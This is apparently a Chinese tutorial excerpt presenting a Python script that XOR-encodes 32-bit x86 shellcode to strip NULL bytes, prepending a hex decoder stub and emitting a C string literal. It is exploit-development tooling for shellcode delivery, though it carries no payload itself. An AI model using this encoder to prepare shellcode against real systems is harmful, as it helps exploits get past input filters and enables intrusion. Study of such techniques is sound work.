通常为了简洁及避免出现NULL字节，ShellCode中会使用hash（注意hash本身并不是加密）。而有些时候，我们也可以直接对ShellCode进行编码（例如下面的XOR编码）来去除NULL字节：
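#!/usr/bin/env python
"""XOR-encode an x86 (32-bit) shellcode so that the result contains no NULL byte.

Usage: encoder.py <shellcode.txt>

The input file holds the raw shellcode as whitespace-separated hex bytes
("33 C9 8A 1C ..."; line breaks between bytes are fine).  The script lists
every key byte that can be used, asks for one, and writes encode.txt into the
current directory: a C string literal made of a small decoder stub followed by
the XOR-encoded payload, plus a "total bytes" line.

Why a key is "usable": b ^ key == 0 exactly when b == key, so a key that does
not occur anywhere in the shellcode never produces a NULL in the encoded
payload.  The key byte itself is patched into the decoder stub, so 0x00 is
never offered as a key.  The stub compares its loop counter against a one-byte
length immediate, so the payload must be 1..255 bytes long.

Fixes over the first version: key 0x00 was offered when the shellcode had no
NULL (which puts a NULL into the stub); multi-line input files were joined
without a separator, merging the last byte of one line with the first of the
next; payloads of 256+ bytes overflowed the one-byte length; a non-hex key
crashed with a traceback; files were not closed on the error paths.
"""
import os
import sys

try:
    _prompt = raw_input  # Python 2
except NameError:  # Python 3
    _prompt = input

# Decoder stub (x86, 32-bit) with the key (KK) and payload length (LL) patched in:
#   83 C4 14     add  esp, 0x14       ; assumes esp then points at the encoded bytes
#   33 C9        xor  ecx, ecx
#   8A 1C 0C     mov  bl, [esp+ecx]   ; loop:
#   80 F3 KK     xor  bl, KK
#   88 1C 0C     mov  [esp+ecx], bl   ; decodes in place -> payload memory must be writable
#   41           inc  ecx
#   80 F9 LL     cmp  cl, LL
#   75 F1        jne  loop
# NOTE(review): the `add esp, 0x14` only works if the encoded bytes sit exactly
# 0x14 bytes above esp at entry, which depends on how the payload is launched;
# verify in a debugger before relying on it.  The stub clobbers ebx and ecx.
DECODER_STUB = "83 C4 14 33 C9 8A 1C 0C 80 F3 %02X 88 1C 0C 41 80 F9 %02X 75 F1"
MAX_PAYLOAD = 0xFF  # `cmp cl, LL` takes a one-byte immediate
BYTES_PER_LINE = 8
OUTPUT_NAME = 'encode.txt'


def parse_shellcode(text):
    """Parse whitespace-separated hex byte tokens into a list of ints (0..255).

    Raises ValueError on a token that is not hex or does not fit in one byte
    (e.g. two bytes run together).
    """
    values = []
    for tok in text.split():
        try:
            value = int(tok, 16)
        except ValueError:
            raise ValueError('not a hex byte: %r' % tok)
        if not 0 <= value <= 0xFF:
            raise ValueError('byte out of range: %r' % tok)
        values.append(value)
    return values


def usable_keys(code):
    """Return, ascending, every key byte that yields a NULL-free encoding.

    A key is usable iff it is non-zero (it is embedded verbatim in the stub)
    and does not occur in the shellcode (b ^ key == 0 only when b == key).
    """
    present = set(code)
    return [k for k in range(1, 0x100) if k not in present]


def encode(code, key):
    """Return decoder stub + XOR-encoded payload as a list of byte values.

    Raises ValueError if the key is not usable for this shellcode or if the
    payload length does not fit the stub's one-byte length field.
    """
    if not 1 <= key <= 0xFF or key in code:
        raise ValueError('key %02X is not usable for this shellcode' % key)
    if not 1 <= len(code) <= MAX_PAYLOAD:
        raise ValueError('payload must be 1..%d bytes, got %d'
                         % (MAX_PAYLOAD, len(code)))
    stub = [int(tok, 16) for tok in (DECODER_STUB % (key, len(code))).split()]
    out = stub + [b ^ key for b in code]
    # Belt and braces: the whole point of the tool is a NULL-free blob.
    if 0 in out:
        raise ValueError('internal error: NULL byte in encoded output')
    return out


def format_c_string(byte_values, per_line=BYTES_PER_LINE):
    """Render bytes as "\\xNN..." C string lines followed by a "total bytes" trailer.

    Each line holds at most `per_line` bytes; the trailer counts stub + payload.
    """
    lines = []
    for start in range(0, len(byte_values), per_line):
        chunk = byte_values[start:start + per_line]
        lines.append('"' + ''.join('\\x%02X' % b for b in chunk) + '"')
    return '\n'.join(lines) + '\n\ntotal bytes: %d' % len(byte_values)


def main(argv=None):
    """Command-line entry point; returns the process exit status."""
    argv = sys.argv if argv is None else argv
    if len(argv) != 2:
        print('UseAge: Encoder filename')
        return 1
    # os.path.join keeps the original "file in the current directory"
    # behaviour while also working on non-Windows hosts and absolute paths.
    filepath = os.path.join(os.getcwd(), argv[1])
    if not os.path.exists(filepath):
        print('[!] Error: file not exists!')
        return 1
    with open(filepath, 'r') as fp:
        text = fp.read()
    try:
        code = parse_shellcode(text)
    except ValueError as exc:
        print('[!] Error: %s' % exc)
        return 1
    if not 1 <= len(code) <= MAX_PAYLOAD:
        print('[!] Error: payload must be 1..%d bytes (got %d)'
              % (MAX_PAYLOAD, len(code)))
        return 1
    keys = usable_keys(code)
    if not keys:
        print('[!] Error: every byte value 01..FF occurs in the shellcode; '
              'no single-byte XOR key avoids NULL')
        return 1
    print('All the Keys can be used:\n')
    print(' '.join('%02X' % k for k in keys))
    raw = _prompt('\n\nEnter the Key: ')
    try:
        key = int(raw.strip(), 16)
    except ValueError:
        print('[!] Key is invalid!')
        return 1
    if key not in keys:
        print('[!] Key is invalid!')
        return 1
    encoded = encode(code, key)
    outpath = os.path.join(os.getcwd(), OUTPUT_NAME)
    with open(outpath, 'w') as fw:
        fw.write(format_c_string(encoded))
    print('[+] Done!')
    return 0


if __name__ == '__main__':
    sys.exit(main())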
用法示例:
传入刚提取出来的shellcode.txt（内容为以空格分隔的十六进制字节，如“33 C9 8A 1C ...”），然后运行“encoder.py shellcode.txt”，从列出的可用key中选择一个（这些key与ShellCode中的任何一个字节都不相同，因此XOR之后不会产生NULL），之后会在当前目录下产生encode.txt。